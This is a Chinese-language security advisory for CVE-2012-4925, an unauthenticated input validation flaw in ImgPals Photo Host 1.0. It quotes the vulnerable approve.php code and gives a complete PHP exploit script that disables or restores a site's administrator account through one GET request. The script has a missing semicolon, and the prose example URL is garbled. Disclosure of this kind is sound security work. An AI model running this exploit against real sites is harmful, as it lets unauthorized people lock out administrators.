ImgPals Photo Host远程输入验证漏洞
发布日期:2012-02-28
更新日期:2012-09-29
受影响系统:imgpals ImgPals Photo Host
描述:
BUGTRAQ ID:
52195
CVE(CAN) ID:
CVE-2012-4925
ImgPals Photo Host是网络相册管理软件。
ImgPals Photo Host 1.0 STABLE存在输入验证漏洞,成功利用后可允许攻击者执行未授权操作,例如禁用管理员账户。
<*来源:Corrado Liotta
链接:
http://www.securityfocus.com/archive/1/521819/30/0/threaded
*>
测试方法:
警 告
以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!
if ($_GET['a'] == 'app0'){
$sqlapprove = mysql_query("UPDATE members SET
approved = '0' WHERE id = '".$_GET['u']."'");
by sending the command approve.php? u = a = 1 & app0 a attaker can
disable the Administrator account.
...::[ Exploit ]::..
#!/usr/bin/php -f
<?php
//Coded by Corrado Liotta For educational purpose only
//use php exploit.php server app0 or app1
//use app0 for admin account off
//use app1 for admin account on
$target = $argv[1];
$power = $argv[2]
$ch = curl_init();
curl_setopt($ch, CURLOPT_RETURNTRANSFER,1);
curl_setopt($ch, CURLOPT_URL, "http://$target/approve.php?u=1&a=$power");
curl_setopt($ch, CURLOPT_HTTPGET, 1);
curl_setopt($ch, CURLOPT_USERAGENT, "Mozilla/4.0 (compatible; MSIE
5.01; Windows NT 5.0)");
curl_setopt($ch, CURLOPT_TIMEOUT, 3);
curl_setopt($ch, CURLOPT_LOW_SPEED_LIMIT, 3);
curl_setopt($ch, CURLOPT_LOW_SPEED_TIME, 3);
curl_setopt($ch, CURLOPT_COOKIEJAR, "/tmp/cookie_$target");
$buf = curl_exec ($ch);
curl_close($ch);
unset($ch);
echo $buf;
?>
建议:
厂商补丁:
imgpals
-------
目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:
http://www.imgpals.com/forum/index.php?topic=3浏览次数:2475
严重程度:0(网友投票)